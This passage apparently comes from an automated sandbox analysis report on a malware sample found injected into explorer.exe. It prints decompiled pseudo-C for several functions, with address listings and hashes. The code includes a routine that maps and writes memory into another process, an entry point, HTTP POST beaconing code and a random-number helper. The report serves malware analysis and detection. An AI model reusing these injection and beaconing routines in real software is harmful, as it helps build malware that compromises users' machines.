                    • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                  • String ID: FALSE$TRUE
                  • API String ID: 1290676130-1412513891
                  • Opcode ID: fd0da92d71a609a41cde1273ae150ca2c70824a64de54787017548948694e438
                  • Instruction ID: 1b20700aac11c4dae470c7e010e7ba276413c48b0cffd0f81d1503e5e528a265
                  • Opcode Fuzzy Hash: fd0da92d71a609a41cde1273ae150ca2c70824a64de54787017548948694e438
                  • Instruction Fuzzy Hash: 58E15E71E00219AFDF54FFA4C985EEEBBB9FF48310F14815AE545AB292DB31A901CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008C6C0, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 200registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 59%
                  			E0008C6C0(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				struct HINSTANCE__* _v40;
				char _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t96;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct HINSTANCE__* _t116;
				intOrPtr _t120;
				intOrPtr _t126;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t139;
				char _t140;
				intOrPtr _t141;

				_t69 =  *0x9e688; // 0xb0000
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E0008E23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						_t136 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						_t71 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t71 + 0x20))(_v16);
					}
					return _v8;
				}
				_push(_t116);
				_push(0x8000000);
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				_push(0x40);
				_push( &_v44);
				_push(_t116);
				_push(0xe);
				_push( &_v16);
				_t80 =  *0x9e780; // 0x0
				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
					if(_t106 != 0) {
						DestroyWindow(_t106);
						UnregisterClassA( &_v56, 0);
					}
				}
				_t139 =  *0x9e780; // 0x0
				_push(0x40);
				_push(0);
				_push(2);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				_push(GetCurrentProcess());
				_push(_v16);
				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_push(0x40);
					_push(0);
					_push(2);
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_t126 = _v20;
					_push( &_v8);
					_t92 =  *0x9e780; // 0x0
					_push(_t126);
					_push(_v16);
					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
						goto L12;
					}
					_t140 = E00088669( *0x9e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t95 =  *0x9e684; // 0x293f8f0
					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
					_t120 =  *0x9e684; // 0x293f8f0
					_t131 = _t96;
					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E0008861A( &_v32, 0x1ac4);
					_t141 =  *0x9e688; // 0xb0000
					 *0x9e688 = _t131;
					E000886E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E0008C63F(_v12, _v8, _v36);
					 *0x9e688 = _t141;
					goto L14;
				}
			}


































                  0x0008c6c6
                  0x0008c6cd
                  0x0008c6cf
                  0x0008c6d1
                  0x0008c6d3
                  0x0008c6d6
                  0x0008c6d9
                  0x0008c6dc
                  0x0008c6df
                  0x0008c6e2
                  0x0008c6e5
                  0x0008c6ef
                  0x0008c6f2
                  0x0008c6f9
                  0x0008c6fe
                  0x0008c6fe
                  0x0008c704
                  0x0008c706
                  0x0008c70f
                  0x0008c8b5
                  0x0008c8b9
                  0x0008c8be
                  0x0008c8c4
                  0x0008c8c7
                  0x0008c8c7
                  0x0008c8cb
                  0x0008c8d0
                  0x0008c8d5
                  0x0008c8e2
                  0x0008c8e2
                  0x0008c8eb
                  0x0008c8ed
                  0x0008c8f5
                  0x0008c8f5
                  0x0008c8fc
                  0x0008c8fc
                  0x0008c718
                  0x0008c719
                  0x0008c71e
                  0x0008c724
                  0x0008c726
                  0x0008c727
                  0x0008c728
                  0x0008c72d
                  0x0008c72e
                  0x0008c738
                  0x00000000
                  0x00000000
                  0x0008c743
                  0x0008c74d
                  0x0008c757
                  0x0008c75a
                  0x0008c760
                  0x0008c767
                  0x0008c768
                  0x0008c769
                  0x0008c772
                  0x0008c773
                  0x0008c774
                  0x0008c776
                  0x0008c779
                  0x0008c77c
                  0x0008c77f
                  0x0008c782
                  0x0008c78e
                  0x0008c7b0
                  0x0008c7b8
                  0x0008c7bb
                  0x0008c7c6
                  0x0008c7c6
                  0x0008c7b8
                  0x0008c7cc
                  0x0008c7d5
                  0x0008c7d7
                  0x0008c7d8
                  0x0008c7da
                  0x0008c7db
                  0x0008c7dc
                  0x0008c7dd
                  0x0008c7e1
                  0x0008c7e8
                  0x0008c7e9
                  0x0008c7f1
                  0x0008c8b2
                  0x00000000
                  0x0008c7f7
                  0x0008c7f7
                  0x0008c7f9
                  0x0008c7fa
                  0x0008c7ff
                  0x0008c800
                  0x0008c801
                  0x0008c802
                  0x0008c803
                  0x0008c809
                  0x0008c80a
                  0x0008c80f
                  0x0008c810
                  0x0008c818
                  0x00000000
                  0x00000000
                  0x0008c82e
                  0x0008c830
                  0x0008c837
                  0x00000000
                  0x00000000
                  0x0008c848
                  0x0008c84e
                  0x0008c856
                  0x0008c859
                  0x0008c85f
                  0x0008c86f
                  0x0008c87b
                  0x0008c880
                  0x0008c886
                  0x0008c896
                  0x0008c8a2
                  0x0008c8aa
                  0x00000000
                  0x0008c8aa

                  APIs
                  • RegisterClassExA.USER32 ref: 0008C785
                  • CreateWindowExA.USER32 ref: 0008C7B0
                  • DestroyWindow.USER32 ref: 0008C7BB
                  • UnregisterClassA.USER32(?,00000000), ref: 0008C7C6
                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0008C7E2
                  • GetCurrentProcess.KERNEL32(00000000), ref: 0008C8DB
                    • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
                  • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                  • API String ID: 3082384575-2319545179
                  • Opcode ID: f1727252491e073bc0b48fd9dcaf6412e4aa2d6629060b779a89976dd17fed39
                  • Instruction ID: d3e88f71527c21399528f0c4bf061e6e508ee729baa66594f0f525f79852064d
                  • Opcode Fuzzy Hash: f1727252491e073bc0b48fd9dcaf6412e4aa2d6629060b779a89976dd17fed39
                  • Instruction Fuzzy Hash: 49712971900249EFEB10DF95DC49EEEBBB9FB89710F14406AF605A7290DB74AE04CB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00085F82, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 104COMMON
                  Download Yara Rule
                  C-Code - Quality: 78%
                  			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				char _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t49;
				int _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq");
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E000885EF();
				_t19 = E0008980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E00088F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x9e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E000895C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E000885C2( &_a8);
							_t53 = _t53 + 1;
						} while (_t53 < 0x2710);
						E00092A5B( *0x9e69c);
						 *_t55 = 0x7c3;
						 *0x9e684 = E0008E1BC(0x9ba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E000895E1(0x9ba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32);
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E000885D5();
							_v8 = 0;
							_t37 =  *0x9e684; // 0x293f8f0
							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E00085E06, 0, 0,  &_v8);
							 *0x9e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E000885D5();
					}
					goto L10;
				}
			}





















                  0x00085f82
                  0x00085f92
                  0x00085f9c
                  0x000860d0
                  0x000860c3
                  0x00000000
                  0x000860c5
                  0x000860d7
                  0x00086098
                  0x00000000
                  0x00086098
                  0x00085fa2
                  0x00085faa
                  0x00085fb1
                  0x00085fb3
                  0x00000000
                  0x00085fc6
                  0x00085fc6
                  0x00085fcc
                  0x00085fd2
                  0x00085fe2
                  0x00085fe7
                  0x00085fef
                  0x00085ff7
                  0x00086013
                  0x00086018
                  0x0008601b
                  0x0008601d
                  0x0008601f
                  0x0008602c
                  0x00086035
                  0x0008603e
                  0x00086043
                  0x00086044
                  0x00086052
                  0x0008605c
                  0x0008606d
                  0x00086072
                  0x00086079
                  0x00086080
                  0x00086083
                  0x0008608f
                  0x00086090
                  0x0008609c
                  0x000860a5
                  0x000860a9
                  0x000860b7
                  0x000860ba
                  0x000860c1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x000860c1
                  0x00086092
                  0x00086097
                  0x00000000
                  0x00085ff7

                  APIs
                  • OutputDebugStringA.KERNEL32(Hello qqq), ref: 00085F92
                  • SetLastError.KERNEL32(000000AA), ref: 000860D7
                    • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                    • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
                    • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
                  • GetModuleHandleA.KERNEL32(00000000), ref: 00085FCC
                  • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00085FE7
                  • GetLastError.KERNEL32 ref: 00085FEF
                  • memset.MSVCRT ref: 00086013
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00086035
                  • GetFileAttributesW.KERNEL32(00000000), ref: 00086083
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                  • String ID: Hello qqq
                  • API String ID: 1203100507-3610097158
                  • Opcode ID: 6c4e10b46dcdce25dcf17f39e375e9fff7939ad34e1c600105cf40c827e96d10
                  • Instruction ID: 5d8fc15084eb67a1e967e79224f0c4bd4c543ae9b3caa409572413b5ae1d139a
                  • Opcode Fuzzy Hash: 6c4e10b46dcdce25dcf17f39e375e9fff7939ad34e1c600105cf40c827e96d10
                  • Instruction Fuzzy Hash: AD31A771900544ABEB64BF30DC49EAF37B8FB81720F10852AF495C6292DF389A49DF21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008E668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305COMMON
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E0008E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E000895C7(0x85b);
				_v60 = E000895C7(0xdc9);
				_v56 = E000895C7(0x65d);
				_v52 = E000895C7(0xdd3);
				_t105 = E000895C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E0008C379(_t214));
				_t113 =  *0x9e6a4; // 0x0
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x9e6a4; // 0x0
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x9e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x9e6a4; // 0x0
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x9e6a4; // 0x0
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x9e6a4; // 0x0
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x9e6a4; // 0x0
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x9e6a4; // 0x0
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E0008980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x9e6a4; // 0x0
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E0008980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E000895C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x9e6a4; // 0x0
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E0008C379(_t217), _a4, _a8);
										E000885C2( &_v12);
										if(_a24 != 0) {
											E0008980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x9e6a4; // 0x0
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E00089749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x9e6a4; // 0x0
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x9e6a4; // 0x0
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x9e6a4; // 0x0
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x9e6a4; // 0x0
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x9e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x9e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x9e6a4; // 0x0
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x9e6a4; // 0x0
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}



































































                  0x0008e671
                  0x0008e683
                  0x0008e68c
                  0x0008e696
                  0x0008e69a
                  0x0008e6ab
                  0x0008e6c2
                  0x0008e6cf
                  0x0008e6dc
                  0x0008e6e9
                  0x0008e6ec
                  0x0008e6f1
                  0x0008e6f6
                  0x0008e6f8
                  0x0008e700
                  0x0008e70b
                  0x0008e712
                  0x0008e71e
                  0x0008e721
                  0x0008e72f
                  0x0008e732
                  0x0008e738
                  0x0008e739
                  0x0008e73b
                  0x0008e744
                  0x0008e745
                  0x0008e74a
                  0x0008e750
                  0x0008e75a
                  0x0008e75c
                  0x0008e761
                  0x0008e761
                  0x0008e770
                  0x0008e77f
                  0x0008e783
                  0x0008e792
                  0x0008e795
                  0x0008e79a
                  0x0008e79e
                  0x0008e7a5
                  0x0008e7ac
                  0x0008e7b4
                  0x0008e7bc
                  0x0008e7c3
                  0x0008e7cb
                  0x0008e7d3
                  0x0008e7da
                  0x0008e7e2
                  0x0008e7ea
                  0x0008e7ff
                  0x0008e80c
                  0x0008e80e
                  0x0008e813
                  0x0008e813
                  0x0008e81a
                  0x0008e82b
                  0x0008e830
                  0x0008e832
                  0x0008e832
                  0x0008e846
                  0x0008e858
                  0x0008e85a
                  0x0008e85d
                  0x0008e862
                  0x0008e862
                  0x0008e869
                  0x0008e878
                  0x0008e87c
                  0x0008e8ba
                  0x0008e8bf
                  0x0008e8c7
                  0x0008e8cc
                  0x0008e8d7
                  0x0008e8dd
                  0x0008e8e7
                  0x0008e8ea
                  0x0008e8f3
                  0x0008e8f8
                  0x0008e8f8
                  0x0008e901
                  0x0008e94a
                  0x0008e94c
                  0x0008e953
                  0x0008e954
                  0x0008e957
                  0x0008e95d
                  0x0008e961
                  0x0008e962
                  0x0008e967
                  0x0008e969
                  0x0008e96f
                  0x0008e984
                  0x0008e98c
                  0x0008e9c1
                  0x0008e9c6
                  0x0008e9cb
                  0x00000000
                  0x0008e9cd
                  0x0008e98e
                  0x0008e990
                  0x0008e990
                  0x0008e999
                  0x0008e99c
                  0x0008e99e
                  0x0008e9a0
                  0x0008e9a6
                  0x0008e9a6
                  0x0008e9ab
                  0x0008e9ad
                  0x0008e9b4
                  0x0008e9b4
                  0x00000000
                  0x0008e9b7
                  0x0008e971
                  0x0008e979
                  0x00000000
                  0x0008e903
                  0x0008e903
                  0x0008e909
                  0x0008e90f
                  0x0008e912
                  0x00000000
                  0x0008e912
                  0x0008e901
                  0x0008e87e
                  0x0008e884
                  0x0008e888
                  0x0008e889
                  0x0008e88e
                  0x0008e890
                  0x0008e896
                  0x0008e8b4
                  0x0008e8b4
                  0x00000000
                  0x0008e8b4
                  0x0008e898
                  0x0008e8a2
                  0x0008e8a4
                  0x0008e8a5
                  0x0008e8aa
                  0x0008e8ac
                  0x0008e8b2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008e86b
                  0x0008e86b
                  0x0008e914
                  0x0008e914
                  0x0008e91a
                  0x0008e91d
                  0x00000000
                  0x0008e91d
                  0x0008e81c
                  0x0008e81c
                  0x0008e91f
                  0x0008e91f
                  0x0008e925
                  0x0008e928
                  0x00000000
                  0x0008e928
                  0x0008e81a
                  0x0008e785
                  0x0008e92a
                  0x0008e92d
                  0x0008e92f
                  0x0008e932
                  0x0008e935
                  0x0008e93e
                  0x0008e943
                  0x00000000
                  0x00000000
                  0x0008e947
                  0x00000000
                  0x0008e947
                  0x0008e754
                  0x00000000

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: memset$ErrorLast
                  • String ID: POST
                  • API String ID: 2570506013-1814004025
                  • Opcode ID: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                  • Instruction ID: ea6434b96816f391ca67125378d8c048189af0a816e14d9e93347baa296bf716
                  • Opcode Fuzzy Hash: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                  • Instruction Fuzzy Hash: 50B13C71900208AFEB55EFA4DC89EAE7BB8FF58310F10406AF545EB291DB749E44CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000916B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 28%
                  			E000916B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}















                  0x000916c1
                  0x000916c8
                  0x000916d1
                  0x000916d5
                  0x00091750
                  0x00000000
                  0x00091752
                  0x000916e3
                  0x000916e5
                  0x000916ea
                  0x00000000
                  0x00000000
                  0x000916f2
                  0x000916f4
                  0x000916f9
                  0x00000000
                  0x00000000
                  0x00091703
                  0x00091707
                  0x00000000
                  0x00000000
                  0x00091709
                  0x0009170e
                  0x00091710
                  0x00091711
                  0x00091715
                  0x0009171b
                  0x00000000
                  0x00000000
                  0x00091726
                  0x0009172f
                  0x00091733
                  0x00000000
                  0x00000000
                  0x00091735
                  0x00091737
                  0x0009173f
                  0x00091741
                  0x00091742
                  0x0009174a
                  0x00000000

                  APIs
                  • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,0008765A,?,?,00000000,?), ref: 000916CB
                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000916E3
                  • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000916F2
                  • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 00091701
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                  • API String ID: 667068680-129414566
                  • Opcode ID: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                  • Instruction ID: f7ee788a374f61118607f953ef7ffa495e5dc05b0280f9c56cf14542586de261
                  • Opcode Fuzzy Hash: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                  • Instruction Fuzzy Hash: B5117731B046177BDF515BEA8C84EEFBBF9AF46780B044065FA15F6240DA70D901A764
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00092122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 87%
                  			E00092122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L00092285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L000922CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
